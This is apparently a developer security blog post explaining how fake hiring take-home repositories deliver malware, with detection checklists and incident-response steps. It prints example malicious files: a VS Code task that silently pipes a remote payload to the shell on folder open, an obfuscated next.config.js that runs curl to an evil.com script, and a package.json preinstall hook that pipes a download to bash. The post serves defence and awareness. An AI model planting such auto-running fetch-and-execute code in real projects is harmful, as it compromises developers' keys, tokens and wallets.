Hiring Scams: How Fake Job Tests Deploy Malware

2026-01-24 · Security · 5 min read

#security #malware #scams #vscode #careers

You get a take-home coding challenge from a recruiter. You clone the repo, open it in VS Code, and—without clicking anything—malware runs. Your SSH keys, browser sessions, and crypto wallets are now at risk. Here's how to spot it.

Malicious VS Code tasks configuration
🚨 CRITICAL WARNING
  • Never run code from unknown sources - even "legitimate-looking" job tests
  • Check .vscode/, next.config.js, and package.json before opening projects
  • Pipe-to-shell execution is a major red flag: curl URL | sh
  • If something auto-runs on folder open, disconnect immediately

Pattern #1: Malicious .vscode/tasks.json

VS Code allows tasks to run automatically when you open a folder. Attackers hide malware execution here because most developers don't check hidden folders.

🚩 RED FLAG: Auto-execution on folder openjson
{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "setup",
      "type": "shell",
      "linux": {
        "command": "wget -qO- 'https://fake-tailwind.vercel.app/payload' | sh"
      },
      "osx": {
        "command": "curl 'https://fake-tailwind.vercel.app/payload' | sh"
      },
      "windows": {
        "command": "curl \"https://fake-tailwind.vercel.app/payload\" | cmd"
      },
      "presentation": {
        "reveal": "never",    // ← Hide terminal output
        "echo": false,        // ← Silent execution
        "close": true         // ← Close immediately
      },
      "runOptions": {
        "runOn": "folderOpen" // ← Runs automatically!
      }
    }
  ]
}

Why this is malicious:

  • Auto-executes on folder open - you don't click anything
  • Pipe-to-shell pattern - downloads and runs remote code instantly
  • Hidden execution - terminal never shows, closes immediately
  • Fake domain - impersonates trusted tools like Tailwind
  • No verification - no checksums, no signatures, no transparency

Pattern #2: Obfuscated next.config.js

Next.js config files run during build and dev server startup. Scammers hide malicious code here using obfuscation or encoded strings.

🚩 RED FLAG: Obfuscated config codejavascript
// next.config.js
const _0x4a2b=['exec','child_process','https://evil.com/payload.sh'];
(function(_0x123,_0x456){const _0x789=function(_0xabc){
  while(--_0xabc){_0x123['push'](_0x123['shift']());}};
  _0x789(++_0x456);
}(_0x4a2b,0x123));


const config = {
  webpack: (config) => {
    require(_0x4a2b[1])[_0x4a2b[0]](`curl ${_0x4a2b[2]} | sh`);
    return config;
  }
};


module.exports = config;

Why this is malicious:

  • Unreadable code - legitimate configs are clean and documented
  • Hex-encoded strings - hiding real URLs and commands
  • child_process.exec() - running shell commands during build
  • Executes on npm run dev or npm run build
✅ What legitimate next.config.js looks likejavascript
// next.config.js
/** @type {import('next').NextConfig} */
const nextConfig = {
  reactStrictMode: true,
  images: {
    domains: ['example.com'],
  },
  env: {
    API_URL: process.env.API_URL,
  },
};


module.exports = nextConfig;

Pattern #3: Suspicious package.json dependencies

Malicious packages can execute code during npm install via install scripts or hidden dependencies.

🚩 RED FLAG: Dangerous install scriptsjson
{
  "name": "hiring-test",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "node scripts/setup.js",
    "preinstall": "curl https://malicious-cdn.com/init.sh | bash"
  },
  "dependencies": {
    "react": "^18.2.0",
    "next": "^14.0.0",
    "@evil-org/helper-utils": "^1.0.0"  // ← typosquatting
  }
}

Red flags in package.json:

  • postinstall/preinstall scripts - run automatically during npm install
  • Typosquatted packages - "react-domm" instead of "react-dom"
  • Unknown scoped packages - @random-org/utils from non-verified publishers
  • Very low download counts - check npm stats before installing
  • Recently published packages - with no commit history or community

What to do BEFORE opening any repo

Pre-flight checklist (30 seconds)
  1. Check .vscode/tasks.json first - look for "runOn": "folderOpen"
  2. Scan with agents - if already cloned and no .vscode folder, scan with tools like cursor or copilot kits agents mode to verify safety.
  3. Read next.config.js - should be clean, no obfuscation
  4. Inspect package.json scripts - no preinstall/postinstall with curl/wget
  5. Verify all dependencies - search each on npmjs.com, check weekly downloads
  6. Never run npm install blindly - review first, install with --ignore-scripts if needed

If you already opened a suspicious repo

Immediate actions:

  1. Disconnect from the internet immediately
  2. Kill VS Code and all terminals
  3. Check running processes for unknown executables
  4. Rotate credentials immediately:
    • SSH keys (~/.ssh/)
    • GitHub personal access tokens
    • Browser sessions (logout everywhere)
    • API keys in .env files
  5. Move crypto wallets to new addresses if any were on that machine
  6. Consider full OS reinstall if you had sensitive data

Real-world impact

Developers have lost:

  • Crypto wallets - MetaMask, hardware wallet seeds from browser extensions
  • GitHub accounts - compromised via stolen tokens, used for supply chain attacks
  • Cloud credentials - AWS keys in .env files, leading to massive bills
  • Client data - SSH keys used to access production servers

Even experienced senior engineers have fallen for these because they look legitimate and target high-trust contexts (job applications).

Summary: Trust your instincts

If something feels off, it probably is:

  • ✅ Legitimate companies don't hide code in .vscode/
  • ✅ Real hiring tests don't auto-execute on folder open
  • ✅ Professional repos have clean, documented configs
  • ✅ Your security instincts are valuable—listen to them
Resources
© 2026 Ovodo Blog